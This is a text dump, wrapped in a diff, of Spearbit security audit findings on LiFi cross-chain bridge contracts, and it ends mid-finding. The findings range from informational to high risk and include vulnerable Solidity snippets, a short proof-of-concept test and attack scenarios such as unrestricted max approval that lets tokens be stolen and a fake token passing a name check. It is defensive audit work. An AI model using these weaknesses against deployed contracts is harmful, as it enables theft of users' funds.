However, Native MATIC on the Polygon has the contract 0x0000000000000000000000000000000000001010 address. Even if, It does not pose any risk, Native Matic will be treated as an ERC20 token. contract WithdrawFacet { address private constant NATIVE_ASSET = 0x0000000000000000000000000000000000000000; // address(0) ... Recommendation: Ensure that all native asset withdrawals are not interrupted with native matic address. LibAs- set can be utilized for this informational issue. LiFi: Acknowledged. Spearbit: Acknowledged. 66 +5.5.35 Multiple versions of noLeftovers modifier Severity: Informational Context: Swapper.sol#L22, SwapperV2.sol#L22, Executor.sol#L41 Description: The modifier noLeftovers is defined in 3 different files: Swapper.sol, SwapperV2.sol and Ex- ecutor.sol. While the versions on Swapper.sol and Executor.sol are the same, they differ with the one in Executor.sol. Assuming the recommendation for "Processing of end balances" is followed, the only difference is that noLeftovers in SwapperV2.sol doesn’t revert when new balance is less than initial balance. Code should not be repeated and it’s better to have one version used everywhere to reduce likelihood of bugs. Recommendation: Only keep one canonical version of noLeftovers modifier in SwapperV2.sol. Keep in mind the one difference among the different versions while making this change. LiFi: Acknowledged. Spearbit: Acknowledged +5.5.36 Reduce unchecked scope Severity: Informational Context: FusePoolZap.sol#L46, FusePoolZap.sol#L78 Description: Both zapIn() functions in FusePoolZap.sol operate in unchecked block which means any contained arithmetic can underflow or overflow. Currently, it effects only one line in both functions: • FusePoolZap.sol#L67: uint256 mintAmount = IERC20(address(fToken)).balanceOf(address(this)) - preMintBalance; • FusePoolZap.sol#L104 mintAmount = mintAmount - preMintBalance; Having unchecked for such a large scope when it is applicable to only one line is dangerous. Recommendation: Limit the scope of unchecked to only the two lines pointed above, or remove unchecked entirely since it is just one-off arithmetic and doesn’t save much gas. LiFi: Fixed with PR #54. Spearbit: Verified. +5.5.37 No event exists for core paths/functions Severity: Informational Context: Facet.sol#L15 PeripheryRegistryFacet.sol#L19, LibAccess.sol#L32, LibAccess.sol#L40, AccessManager- Description: Several key actions are defined without event declarations. Owner only functions that change critical parameters can emit events to record these changes on-chain for off-chain monitors/tools/interfaces. There are 4 instances of this issue: 67 contract PeripheryRegistryFacet { function registerPeripheryContract(...) ... { } } contract LibAccess { function addAccess(...) ... { } function removeAccess(...) ... { } } contract AccessManagerFacet { function setCanExecute(...) ... { } } Recommendation: Add events to all functions that change critical parameters/functionalities. LiFi: Fixed with PR #40. Spearbit: Verified. +5.5.38 Rename _receiver to _leftoverReceiver Severity: Informational Context: SwapperV2.sol#L22-L81, Swapper.sol, Executor.sol Description: In the contracts Swapper.sol, SwapperV2.sol and Executor.sol the parameter _receiver is used in various places. Its name seems to suggest that the result of the swapped tokens are send to the _receiver, however this is not the case. Instead the left over tokens are send to the _receiver. This makes the code more difficult to read and maintain. contract SwapperV2 is ILiFi { modifier noLeftovers(..., address payable _receiver) { ... } function _executeAndCheckSwaps(..., address payable _receiver) ... { ... } function _executeSwaps(..., address payable _receiver) ... { ... } } Recommendation: Rename _receiver to something like _leftoverReceiver. LiFi: Fixed with PR #39. Spearbit: Verified. 68 +5.5.39 Native tokens don’t need SwapData.approveTo Severity: Informational Context: SwapperV2.sol#L67-L81, Swapper.sol#L65-L78, Description: The functions _executeSwaps() of both SwapperV2.sol and Swapper.sol use a whitelist to make sure the right functions in the allowed dexes are called. These checks also include a check on approveTo, however approveTo is not relevant when a native token is being used. Currently the caller of the Lifi Diamond has to specify a whitelisted currentSwapData.approveTo to be able to execute _executeSwaps() which doesn’t seem logical. Present in both SwapperV2.sol and Swapper.sol: function _executeSwaps(...) ... { ... if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) ) revert ContractCallNotAllowed(); LibSwap.swap(_lifiData.transactionId, currentSwapData); } } Recommendation: Ignore the approveTo check, when a native tokens is used. Alternatively document what value has to be added at currentSwapData.approveTo when using native tokens and make sure it is whitelisted. LiFi: Fixed with PR #71. Spearbit: Verified. +5.5.40 Inaccurate comment on the maxApproveERC20() function Severity: Informational Context: LibAsset.sol#L40 Description: During the code review, It has been observed that comment is incompatible with the functionality. maxApproveERC20 function approves MAX If asset id does not have sufficient allowance. The comment can be replaced with If a sufficient allowance is not present, the allowance is set to MAX. /// @notice Gives MAX approval for another address to spend tokens /// @param assetId Token address to transfer /// @param spender Address to give spend approval to /// @param amount Amount to approve for spending function maxApproveERC20( IERC20 assetId, address spender, uint256 amount ) Recommendation: Consider changing comment on the maxApproveERC20 function. LiFi: Fixed with PR #23. Spearbit: Verified. 69 +5.5.41 Undocumented contracts Severity: Informational Context: FusePoolZap.sol, SwapperV2.sol, WormholeFacet.sol Description: All systematic contracts are documented on the docs directory. However, several contracts are not documented. LiFi is integrated with third party platforms through API. To understand code functionality, the related contracts should be documented in the directory. Recommendation: Consider documenting these contracts more explicitly by describing their purpose and provide contextual information regarding their functionality. All interacted contracts can be mentioned at the beginning of the file and struct values can be documented per contract. LiFi: Fixed with PR #66. Spearbit: Verified. +5.5.42 Utilize built-in library function on the address check Severity: Informational Context: AmarokFacet.sol#L67, AmarokFacet.sol#L46, AnyswapFacet.sol#L67, AnyswapFacet.sol#L98, Hyphen- Facet.sol#L99, StargateFacet.sol#L225, LibAsset.sol#L80-L131 Description: In the codebase, LibAsset library contains the function which determines whether the given assetId is the native asset. However, this check is not used and many of the other contracts are applying address check seperately. contract AmarokFacet { function startBridgeTokensViaAmarok(...) ... { ... if (_bridgeData.assetId == address(0)) ... } function swapAndStartBridgeTokensViaAmarok(... ) ... { ... if (_bridgeData.assetId == address(0)) ... } } contract AnyswapFacet { function swapAndStartBridgeTokensViaAnyswap(...) ... { ... if (_anyswapData.token == address(0)) revert TokenAddressIsZero(); ... } } contract HyphenFacet { function _startBridge(...) ... { ... if (_hyphenData.token != address(0)) ... } } contract StargateFacet { function _startBridge(...) ... { ... if (token == address(0)) ... 70 } } contract LibAsset { function transferFromERC20(...) ... { ... if (assetId == NATIVE_ASSETID) revert NullAddrIsNotAnERC20Token(); ... } function transferAsset(...) ... { ... (assetId == NATIVE_ASSETID) ... } } Recommendation: It is recommended to utilize LibAsset’s isNativeAsset function. ... - + ... if (_bridgeData.assetId == address(0)) { if (LibAsset.isNativeAsset(_bridgeData.assetId)) { revert TokenAddressIsZero(); } LiFi: Fixed with PR #14. Spearbit: Verified. +5.5.43 Consider using wrapped native token Severity: Informational Context: LiFi src Description: The code currently supports bridging native tokens. However this has the following drawbacks: • not every bridge supports native tokens; • native tokens have an inherent risk of reentrancy; • native tokens introduce additional code paths, which is more difficult to maintain and results in a higher risk of bugs. Also wrapped tokens are more composable. This is also useful for bridges that currently don’t support native tokens like the AxelarFacet, the WormholeFacet, and the StargateFacet. Recommendation: Consider only supporting wrapped native tokens in the LiFi Protocol. An additional wrapper layer can be used to convert the native token in a generic way. LiFi: No plans to implement wrapping across the board at this time. Spearbit: Acknowledged. 71 +5.5.44 Incorrect event emitted Severity: Informational Context: FeeCollector.sol#L180, OwnershipFacet.sol#L55 Description: Li.fi follows a two-step ownership transfer pattern, where the current owner first proposes an address to be the new owner. Then that address accepts the ownership in a different transaction via confirmOwnership- Transfer(): function confirmOwnershipTransfer() external { if (msg.sender != pendingOwner) revert NotPendingOwner(); owner = pendingOwner; pendingOwner = LibAsset.NULL_ADDRESS; emit OwnershipTransferred(owner, pendingOwner); } At the time of emitting OwnershipTransferred, pendingOwner is always address(0) and owner is the new owner. This event should be used to log the addresses between which the ownership transfer happens. Recommendation: Emit the event before the ownership transfer happens: function confirmOwnershipTransfer() external { address _pendingOwner = pendingOwner; if (msg.sender != _pendingOwner) revert NotPendingOwner(); emit OwnershipTransferred(owner, _pendingOwner); owner = _pendingOwner; pendingOwner = LibAsset.NULL_ADDRESS; } Note the gas optimization of first storing the storage variable pendingOwner in memory as _pendingOwner. This is done to avoid the gas costs to read the same storage variable more than once. LiFi: Implemented with PR #16. Spearbit: Verified. +5.5.45 If statement does not check mintAmount properly Severity: Informational Context: FusePoolZap.sol#L100 Description: On the zapIn function, mintAmount is checked with the following If statement. However, It is directly getting contract balance instead of taking difference between mintAmount and preMintBalance. ... ... uint256 mintAmount = IERC20(address(fToken)).balanceOf(address(this)); if (!success && mintAmount == 0) { revert MintingError(res); } mintAmount = mintAmount - preMintBalance; Recommendation: It is recommended to use balance difference on the if statement. 72 - + - uint256 mintAmount = IERC20(address(fToken)).balanceOf(address(this)); uint256 mintAmount = IERC20(address(fToken)).balanceOf(address(this)) - preMintBalance; if (!success && mintAmount == 0) { revert MintingError(res); } mintAmount = mintAmount - preMintBalance; LiFi: Fixed with PR #17. Spearbit: Verified. +5.5.46 Use address(0) for zero address Severity: Informational Context: LibAsset.sol#L15 Description: It’s better to use shorthands provided by Solidity for popular constant values to improve readability and likelihood of errors. address internal constant NULL_ADDRESS = 0x0000000000000000000000000000000000000000; //address(0) Recommendation: Use address(0) as the value for NULL_ADDRESS. LiFi: Fixed with PR #18. Spearbit: Verified. +5.5.47 Better variable naming Severity: Informational Context: LibAsset.sol#L13 Description: MAX_INT is defined to be the maximum value of uint256 data type: uint256 private constant MAX_INT = type(uint256).max; This variable name can be interpreted as the maximum value of int256 data type which is lower than type(uint256).max. Recommendation: Rename MAX_INT to MAX_UINT. LiFi: Fixed with PR #33. Spearbit: Verified. +5.5.48 Event is missing indexed fields Severity: Informational Context: FusePoolZap.sol#L33 Description: Index event fields make the field more quickly accessible to off-chain tools that parse events. How- ever, note that each index field costs extra gas during emission, so it’s not necessarily best to index the maximum allowed per event (three fields). Recommendation: Add index on the event. ... - event ZappedIn(address pool, address fToken, uint256 amount); + event ZappedIn(address indexed pool, address indexed fToken, uint256 amount); ... 73 LiFi: Fixed with PR #34. Spearbit: Verified. +5.5.49 Remove misleading comment Severity: Informational Context: WithdrawFacet.sol#L88 Description: WithdrawFacet.sol has the following misleading comment which can be removed. It’s unclear why this comment was made. address self = address(this); // workaround for a possible solidity bug Recommendation: Remove the comment, and directly use address(this) wherever self is used. LiFi: Fixed with PR #22. Spearbit: Verified. +5.5.50 Redundant events/errors/imports on the contracts Severity: Informational Context: FusePoolZap.sol#L28, GenericSwapFacet.sol#L7, WormholeFacet.sol#L12, HyphenFacet.sol#L32, Hy- phenFacet.sol#L9, HopFacet.sol#L9, HopFacet.sol#L36, PolygonBridgeFacet.sol#L28, Executor.sol#L5, Across- Facet.sol#L37, AcrossFacet.sol#L12,NXTPFacet.sol#L9 Description: During the code review, It has been observed that several events and errors are not used in the contracts. With the deleting redundant events and errors, gas can be saved. • FusePoolZap.sol#L28 - CannotDepositNativeToken • GenericSwapFacet.sol#L7 - ZeroPostSwapBalance • WormholeFacet.sol#L12 - InvalidAmount and InvalidConfig • HyphenFacet.sol#L32 - HyphenInitialized • HyphenFacet.sol#L9 - InvalidAmount and InvalidConfig • HopFacet.sol#L9 - InvalidAmount, InvalidConfig and InvalidBridgeConfigLength • HopFacet.sol#L36- HopInitialized • PolygonBridgeFacet.sol#L28 - InvalidConfig • Executor.sol#L5 - IAxelarGasService • AcrossFacet.sol#L37 - UseWethInstead, InvalidAmount, NativeValueWithERC, InvalidConfig • NXTPFacet.sol#L9 - InvalidAmount, NativeValueWithERC, NoSwapDataProvided, InvalidConfig Recommendation: Consider removing redundant events and errors. LiFi: Fixed with PR #37. Spearbit: Verified. 74 +5.5.51 forceSlow option is disabled on the AmarokFacet Severity: Informational Context: AmarokFacet.sol#L134 Description: On the AmarokFacet contract, forceSlow option is disabled. According to documentation, forceS- low is an option that allows users to take the Nomad slow path (~30 mins) instead of paying routers a 0.05% fee on their transaction. ... IConnextHandler.XCallArgs memory xcallArgs = IConnextHandler.XCallArgs({ params: IConnextHandler.CallParams({ to: _bridgeData.receiver, callData: _bridgeData.callData, originDomain: _bridgeData.srcChainDomain, destinationDomain: _bridgeData.dstChainDomain, agent: _bridgeData.receiver, recovery: msg.sender, forceSlow: false, receiveLocal: false, callback: address(0), callbackFee: 0, relayerFee: 0, slippageTol: _bridgeData.slippageTol }), transactingAssetId: _bridgeData.assetId, amount: _amount }); ... Recommendation: The parameter can be taken as an argument on the _startBridge function. LiFi: Fixed with commit 5078. Spearbit: Verified. +5.5.52 Incomplete NatSpec Severity: Informational Context: Executor.sol#L297, Executor.sol#L298, SwapperV2.sol#L49 Description: Some functions are missing @param for some of their parameters. Given that NatSpec is an impor- tant part of code documentation, this affects code comprehension, auditability and usability. Recommendation: Consider adding in full NatSpec comments for all functions to have complete code documen- tation for future use. LiFi: Fixed with PR #7 & PR #100. Spearbit: Verified. 75 +5.5.53 Use nonReentrant modifier in a consistent way Severity: Informational Context: AxelarFacet.sol#L35-L66, FusePoolZap.sol#L45-L77, StargateFacet.sol#L159-L179 Executor.sol#L105- L171 The functions executeCallViaAxelar(), contract Description: AxelarFacet, zapIn of the contract FusePoolZap and completeBridgeTokensViaStargate() - swapAndCom- pleteBridgeTokensViaStargate of the StargateFacet don’t have a nonReentrant modifier. All other facets that integrate with the external contract do have this modifier. executeCallWithTokenViaAxelar of contract AxelarFacet { function executeCallWithTokenViaAxelar(...) ... { } function executeCallViaAxelar(...) ... { } } contract FusePoolZap { function zapIn(...) ... { } } There are 2 versions of sgReceive() / completeBridgeTokensViaStargate() which use different locations for nonReentrant. The makes the code more difficult to maintain and verify. contract StargateFacet is ILiFi, SwapperV2, ReentrancyGuard { function sgReceive(...) external nonReentrant { ... this.swapAndCompleteBridgeTokensViaStargate(lifiData, swapData, assetId, receiver); ... } function completeBridgeTokensViaStargate(...) external { ... } } contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function sgReceive(...) external { ... this.swapAndCompleteBridgeTokensViaStargate(lifiData, swapData, assetId, payable(receiver)); ... } function swapAndCompleteBridgeTokensViaStargate(...) external payable nonReentrant { } } Recommendation: Consider adding a nonReentrant modifier to executeCallViaAxelar(), executeCallWith- TokenViaAxelar of contract AxelarFacet, zapIn of the contract FusePoolZap to be more consistent with the rest of the code. Use the nonReentrant modifier with sgReceive() / completeBridgeTokensViaStargate() in a consistent way. LiFi: Fixed with PR #51. Spearbit: Verified. 76 +5.5.54 Typos on the codebase Severity: Informational Context: Periphery/FeeCollector.sol#L168, DexManagerFacet.sol#L41, GenericBridgeFacet.sol#L108, Anyswap- Facet.sol#L108, OwnershipFacet.sol#L31, NXTPFacet.sol#L121 Description: Across the codebase, there are typos on the comments. • cancelOnwershipTransfer -> cancelOwnershipTransfer. • addresss -> address. • Conatains -> Contains. • Intitiates -> Initiates. Recommendation: Consider correcting the typo and review the codebase to check for more to improve code readability. LiFi: Fixed with PR #5. Spearbit: Verified. +5.5.55 Store all error messages in GenericErrors.sol Severity: Informational Context: lifinance src GenericErrors.sol Description: The file GenericErrors.sol contains several error messages and is used from most other solidity files. However several other error messages are defined in the solidity files themselves. It would be more con- sistent and easier to maintain to store these in GenericErrors.sol as well. Note: the Periphery contract also contains error messages which are not listed below. Here are the error messages contained in the solidity files: Facets/AcrossFacet.sol:37: Facets/AmarokFacet.sol:31: Facets/ArbitrumBridgeFacet.sol:30: Facets/GnosisBridgeFacet.sol:31: Facets/GnosisBridgeFacet.sol:32: Facets/OmniBridgeFacet.sol:27: Facets/OptimismBridgeFacet.sol:29: Facets/OwnershipFacet.sol:20: Facets/OwnershipFacet.sol:21: Facets/OwnershipFacet.sol:22: Facets/OwnershipFacet.sol:23: Facets/PolygonBridgeFacet.sol:28: Facets/PolygonBridgeFacet.sol:29: Facets/StargateFacet.sol:39: Facets/StargateFacet.sol:40: Facets/StargateFacet.sol:41: Facets/WithdrawFacet.sol:20: Facets/WithdrawFacet.sol:21: Helpers/ReentrancyGuard.sol:20: Libraries/LibAccess.sol:18: Libraries/LibSwap.sol:9: error UseWethInstead(); error InvalidReceiver(); error InvalidReceiver(); error InvalidDstChainId(); error InvalidSendingToken(); error InvalidReceiver(); error InvalidReceiver(); error NoNullOwner(); error NewOwnerMustNotBeSelf(); error NoPendingOwnershipTransfer(); error NotPendingOwner(); error InvalidConfig(); error InvalidReceiver(); error InvalidConfig(); error InvalidStargateRouter(); error InvalidCaller(); error NotEnoughBalance(uint256 requested, uint256 available); error WithdrawFailed(); error ReentrancyError(); error UnAuthorized(); error NoSwapFromZeroBalance(); Recommendation: Consider moving the error messages to GenericErrors.sol. LiFi: Fixed with PR #60. Spearbit: Verified. 77 diff --git a/findings_newupdate/spearbit/LIFI-retainer1-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/LIFI-retainer1-Spearbit-Security-Review.txt new file mode 100644 index 0000000..51b3b5e --- /dev/null +++ b/findings_newupdate/spearbit/LIFI-retainer1-Spearbit-Security-Review.txt @@ -0,0 +1,76 @@ +5.1.1 Receiver doesn't always reset allowance Severity: High Risk Context: Receiver.sol#L224-L297 Description: The function _swapAndCompleteBridgeTokens() of Receiver reset the approval to the executor at the end of an ERC20 transfer. However it there is insufficient gas then the approval is not reset. This allows the executor to access any tokens (of the same type) left in the Receiver. function _swapAndCompleteBridgeTokens(...) ... { ... if (LibAsset.isNativeAsset(assetId)) { ... } else { // case 2: ERC20 asset ... token.safeIncreaseAllowance(address(executor), amount); if (reserveRecoverGas && gasleft() < _recoverGas) { token.safeTransfer(receiver, amount); ... return; // no safeApprove 0 } try executor.swapAndCompleteBridgeTokens{...} ... token.safeApprove(address(executor), 0); } } Recommendation: Only increase the allowance if sufficient gas is available, for example in the following way function _swapAndCompleteBridgeTokens(...) ... { ... if (LibAsset.isNativeAsset(assetId)) { ... } else { // case 2: ERC20 asset ... token.safeIncreaseAllowance(address(executor), amount); if (reserveRecoverGas && gasleft() < _recoverGas) { token.safeTransfer(receiver, amount); ... return; } token.safeIncreaseAllowance(address(executor), amount); try executor.swapAndCompleteBridgeTokens{...} ... token.safeApprove(address(executor), 0); - + } } LiFi: Fixed in PR 247. Spearbit: Verified. 5 +5.1.2 CelerIMFacet incorrectly sets RelayerCelerIM as receiver Severity: High Risk Context: CelerIMFacet.sol#L171-L177 Description: When assigning a bytes memory variable to a new variable, the new variable points to the same memory location. Changing any one variable updates the other variable. Here is a PoC as a foundry test function testCopy() public { Pp memory x = Pp({ a: 2, b: address(2) }); Pp memory y = x; y.b = address(1); assertEq(x.b, y.b); } Thus, when CelerIMFacet._startBridge() updates bridgeDataAdjusted.receiver, _bridgeData.receiver is implicitly updated too. This makes the receiver on the destination chain to be the relayer address. // case 'yes': bridge + dest call - send to relayer ILiFi.BridgeData memory bridgeDataAdjusted = _bridgeData; bridgeDataAdjusted.receiver = address(relayer); (bytes32 transferId, address bridgeAddress) = relayer .sendTokenTransfer{ value: msgValue }(bridgeDataAdjusted, _celerIMData); // call message bus via relayer incl messageBusFee relayer.forwardSendMessageWithTransfer{value: _celerIMData.messageBusFee}( _bridgeData.receiver, uint64(_bridgeData.destinationChainId), bridgeAddress, transferId, _celerIMData.callData ); Recommendation: Remove bridgeDataAdjusted and work with _bridgeData as follows: // case 'yes': bridge + dest call - send to relayer -ILiFi.BridgeData memory bridgeDataAdjusted = _bridgeData; -bridgeDataAdjusted.receiver = address(relayer); +address receiver = _bridgeData.receiver; +_bridgeData.receiver = address(relayer); (bytes32 transferId, address bridgeAddress) = relayer -.sendTokenTransfer{ value: msgValue }(bridgeDataAdjusted, _celerIMData); +.sendTokenTransfer{ value: msgValue }(_bridgeData, _celerIMData); // call message bus via relayer incl messageBusFee relayer.forwardSendMessageWithTransfer{value: _celerIMData.messageBusFee}( - + _bridgeData.receiver receiver, uint64(_bridgeData.destinationChainId), bridgeAddress, transferId, _celerIMData.callData ); +_bridgeData.receiver = receiver; LiFi: Fixed in PR 252. Spearbit: Verified. 6 +5.1.3 Max approval to any address is possible Severity: High Risk Context: HopFacetOptimized.sol#L33-L45 Description: HopFacetOptimized.setApprovalForBridges() can be called by anyone to give max approval to any address for any ERC20 token. Any ERC20 token left in the Diamond can be stolen. function setApprovalForBridges(address[] calldata bridges,address[] calldata tokensToApprove) external { ... LibAsset.maxApproveERC20(..., type(uint256).max); ... } Recommendation: Add authorization to the function setApprovalForBridges() so only the owner can call it. For example in the following way function setApprovalForBridges(address[] calldata bridges,address[] calldata tokensToApprove) external { + LibDiamond.enforceIsContractOwner(); ... LibAsset.maxApproveERC20(..., type(uint256).max); ... } LiFi: Fixed in PR 244. Spearbit: Verified. +5.1.4 Return value of low-level .call() not checked Severity: High Risk Context: Receiver.sol#L209, Receiver.sol#L238, Receiver.sol#L257, If its return Description: Low-level primitive .call() doesn't revert in caller's context when the callee reverts. value is not checked, it can lead the caller to falsely believe that the call was successful. Receiver.sol uses .call() to transfer the native token to receiver. If receiver reverts, this can lead to locked ETH in Receiver contract. Recommendation: Check the return value and revert if false is returned. -receiver.call{ value: amount }(""); +(bool success, ) = receiver.call{ value: amount }(""); +require(success) LiFi: Fixed in PR 244. Spearbit: Verified. 7 5.2 Medium Risk +5.2.1 Limits in LIFuelFacet Severity: Medium Risk Context: LIFuelFacet.sol#L72-L101 Description: The facet LIFuelFacet is meant for small amounts, however, it doesn't have any limits on the funds sent. This might result in funds getting stuck due to insufficient liquidity on the receiving side. function _startBridge(...) ... { ... if (LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) { serviceFeeCollector.collectNativeGasFees{...}(...); } else { LibAsset.maxApproveERC20(...); serviceFeeCollector.collectTokenGasFees(...); ... } } Recommendation: Consider enforcing limits in LIFuelFacet. LiFi: Limits apply to all bridges and depend on the liquidity on the receiving chain. This information is usually not available on the source chain. For sure some high fixed limits could be added but they don't really check that there is that much liquidity available. Checking limits and applying them to the calls is handled by the backend. Spearbit: Acknowledged. +5.2.2 The optimal version _depositAndSwap() isn't always used Severity: Medium Risk Context: AllBridgeFacet.sol#L79-L84, SquidFacet.sol#L112-L117 SwapperV2.sol#L138-L221, AmarokFacet.sol#L97-L102, CelerIMFacet.sol#L127-L132, Description: The function _depositAndSwap() of SwapperV2 has two versions. The second version keeps _- nativeReserve that is meant for fees. Several facets don't use this version although their bridge does require native fees. This could result in calls reverting due to insufficient native tokens left. function _depositAndSwap(...) ... // 4 parameter version /// @param _nativeReserve Amount of native token to prevent from being swept back to the caller function _depositAndSwap(..., uint256 _nativeReserve) ... // 5 parameter version Recommendation: Use the 5 parameter version of _depositAndSwap() where applicable. LiFi: CelerIMFacet is changed to use the 5 parameter version. Other facets don't need this change since we don't bridge native tokens via those facets. Solved in PR 256. Spearbit: Verified. 8 +5.2.3 setContractOwner() is insufficient to lock down the owner Severity: Medium Risk Context: MakeLiFiDiamondImmutable.s.sol#L14-L17. LibDiamond.sol#L70-L75, OwnershipFacet.sol#L66-L73 Description: The function transferOwnershipToZeroAddress() is meant to make the Diamond immutable. It sets the contract owner to 0. However, the contract owner can still be changed if there happens to be a pendingOwner. In that case confirmOwnershipTransfer() can still change the contract owner. function transferOwnershipToZeroAddress() external { // transfer ownership to 0 address LibDiamond.setContractOwner(address(0)); } function setContractOwner(address _newOwner) internal { DiamondStorage storage ds = diamondStorage(); address previousOwner = ds.contractOwner; ds.contractOwner = _newOwner; emit OwnershipTransferred(previousOwner, _newOwner); } function confirmOwnershipTransfer() external { Storage storage s = getStorage(); address _pendingOwner = s.newOwner; if (msg.sender != _pendingOwner) revert NotPendingOwner(); emit OwnershipTransferred(LibDiamond.contractOwner(), _pendingOwner); LibDiamond.setContractOwner(_pendingOwner); s.newOwner = LibAsset.NULL_ADDRESS; } Recommendation: Possible solutions • first call cancelOwnershipTransfer() (and ignore reverts) • reset s.newOwner of the OwnershipFacet • also remove OwnershipFacet (but then function owner() is no longer accessible) LiFi: Solved in PR 250. Spearbit: Verified. +5.2.4 Receiver does not verify address from the originator chain Severity: Medium Risk Context: Receiver.sol#L254 Receiver.sol#L282 Description: The Receiver contract is designed to receive the cross-chain call from libDiamond address on the destination chain. However, it does not verify the source chain address. An attacker can build a malicious _- callData. An attacker can steal funds if there are left tokens and there are allowances to the Executor. Note that the tokens may be lost in issue: "Arithemetic underflow leading to unexpected revert and loss of funds in Receiver contract". And there may be allowances to Executor in issue "Receiver doesn't always reset allowance" Recommendation: This is a tricky issue. Recommend to fixes other issues, especially making sure to clear the allowance. The bridges we're integrating do not always allow users to verify the source address. Take Amarok for example, technically we can verify the sender's address: 9 ,! /// @notice Completes a cross-chain transaction with calldata via Amarok facet on the receiving chain. /// @dev This function is called from Amarok Router. /// @param _transferId The unique ID of this transaction (assigned by Amarok) /// @param _amount the amount of bridged tokens /// @param _asset the address of the bridged token /// @param * (unused) the sender of the transaction /// @param * (unused) the domain ID of the src chain /// @param _callData The data to execute function xReceive( bytes32 _transferId, uint256 _amount, address _asset, address _sender, uint32, bytes memory _callData ) external nonReentrant onlyAmarokRouter { if (_sender != address(diamond) { revert UnAuthorized(); } } However, there's a special feature of Amarok. The _sender address would be address(0) if this is a fast path. If we revert such transactions, all the cross-chain transfers through Amarok would take about 30 minutes and this impacts UX. LiFi: Solved by solving the related issues. Spearbit: Verified. +5.2.5 Arithemetic underflow leading to unexpected revert and loss of funds in Receiver contract. Severity: Medium Risk Context: Receiver.sol#L254 Receiver.sol#L282 Description: The Receiver contract is designed to gracefully return the funds to users. It reserves the gas for recovering gas before doing swaps via executor.swapAndCompleteBridgeTokens. The logic of reserving gas for recovering funds is implemented at Receiver.sol#L236-L258 contract Receiver is ILiFi, ReentrancyGuard, TransferrableOwnership { // ... if (reserveRecoverGas && gasleft() < _recoverGas) { // case 1a: not enough gas left to execute calls receiver.call{ value: amount }(""); // ... } // case 1b: enough gas left to execute calls try executor.swapAndCompleteBridgeTokens{ value: amount, gas: gasleft() - _recoverGas }(_transactionId, _swapData, assetId, receiver) {} catch { receiver.call{ value: amount }(""); } // ... } 10 The gasleft() returns the remaining gas of a call. It is continuously decreasing. The second query of gasleft() is smaller than the first query. Hence, if the attacker tries to relay the transaction with a carefully crafted gas where gasleft() >= _recoverGas at the first quiry and gasleft() - _recoverGas reverts. This results in the token loss in the Receiver contract. Recommendation: Recommend to cache the gasleft() +. - + - + if (LibAsset.isNativeAsset(assetId)) { // case 1: native asset uint256 cacheGasleft = gasleft(); if (reserveRecoverGas && gasleft() < _recoverGas) { if (reserveRecoverGas && cacheGasleft < _recoverGas) { // case 1a: not enough gas left to execute calls receiver.call{ value: amount }(""); emit LiFiTransferRecovered( _transactionId, assetId, receiver, amount, block.timestamp ); return; } // case 1b: enough gas left to execute calls try executor.swapAndCompleteBridgeTokens{ value: amount, gas: gasleft() - _recoverGas gas: cacheGasleft - recoverGas }(_transactionId, _swapData, assetId, receiver) {} catch { receiver.call{ value: amount }(""); } } else { LiFi: Solved in PR 249. Spearbit: Verified. +5.2.6 Use of name to identify a token Severity: Medium Risk Context: CelerIMFacet.sol#L79-L83 Description: startBridgeTokensViaCelerIM() uses the token name to identify cfUSDC token. Another token with the same name can pass this check. An attacker can create a scam token with the name "cfUSDC" and a function canonical() returning a legit ERC20 token address, say WETH. If this token is passed as _bridge- Data.sendingAssetId, CelerIMFacet will transfer WETH. 11 if ( keccak256( abi.encodePacked( ERC20(_bridgeData.sendingAssetId).symbol() ) ) == keccak256(abi.encodePacked(("cfUSDC"))) ) { // special case for cfUSDC token asset = IERC20( CelerToken(_bridgeData.sendingAssetId).canonical() ); } Recommendation: Store cfUSDC address as a constant variable. Use onlyAllowSourceToken modifier to verify _bridgeData.sendingAssetId matches that address. LiFi: Fixed in PR 254. Spearbit: Verified. +5.2.7 Unvalidated destination address in Gravity faucet Severity: Medium Risk Context: GravityFacet.sol#L101 the _gravity- Description: Data.destinationAddress address. The code does not validate if the provided destination address is in the valid bech32 format. there is an issue related to the validation of In the Gravity faucet, This can potentially cause issues when sending tokens to the destination address. If the provided address is not in the bech32 format, the tokens can be locked. Also, it can lead to confusion for the end-users as they might enter an invalid address and lose their tokens without any warning or error message. it is recommended to add a validation check for the _gravity- Recommendation: To mitigate this issue, Data.destinationAddress address. The validation should ensure that the provided address is in the valid bech32 format. This will help prevent the loss of tokens and provide better error handling for the end users. Here are some libraries that might be used: • Bech32.sol • pStake's Bech32.sol LiFi: We validate the address on the backend side, and we don't want to double check in the contract. Spearbit: Acknowledged. +5.2.8 Hardcode or whitelist the Thorswap vault address Severity: Medium Risk Context: ThorSwapFacet.sol#LL104C27-L104C32 Description: The issue with this code is that the depositWithExpiry function allows the user to enter any arbitrary vault address, which could potentially lead to a loss of tokens. If a user enters an incorrect or non-existent vault address, the tokens could be lost forever. There should be some validation on the vault address to ensure that it is a valid and trusted address before allowing deposits to be made to it. • Router 12 // Deposit an asset with a memo. ETH is forwarded, ERC-20 stays in ROUTER function deposit(address payable vault, address asset, uint amount, string memory memo) public payable nonReentrant{ ,! uint safeAmount; if(asset == address(0)){ safeAmount = msg.value; bool success = vault.send(safeAmount); require(success); } else { require(msg.value == 0, "THORChain_Router: unexpected eth"); // protect user from ,! accidentally locking up eth if(asset == RUNE) { safeAmount = amount; iRUNE(RUNE).transferTo(address(this), amount); iERC20(RUNE).burn(amount); } else { safeAmount = safeTransferFrom(asset, amount); // Transfer asset _vaultAllowance[vault][asset] += safeAmount; // Credit to chosen vault } } emit Deposit(vault, asset, safeAmount, memo); } Recommendation: Hardcode or whitelist the vault address. Asgard Vault Addresses can be seen from here. LiFi: LiFi Team claims that they are validating the address on the backend side. Spearbit: Acknowledged. 5.3 Low Risk +5.3.1 Check enough native assets for fee Severity: Low Risk Context: ArbitrumBridgeFacet.sol#L81-L117 SquidFacet.sol#L126-L175, CelerIMFacet.sol#L156-L187, DeBridgeFacet.sol#L119-L148, Description: The function _startBridge() of SquidFacet adds _squidData.fee to _bridgeData.minAmount. It has verified there is enough native asset for _bridgeData.minAmount, but not for _squidData.fee. So this could use native assets present in the Diamond, although there normally shouldn't be any native assets left. A similar issue occurs in: • CelerIMFacet • DeBridgeFacet function _startBridge(...) ... { ... uint256 msgValue = 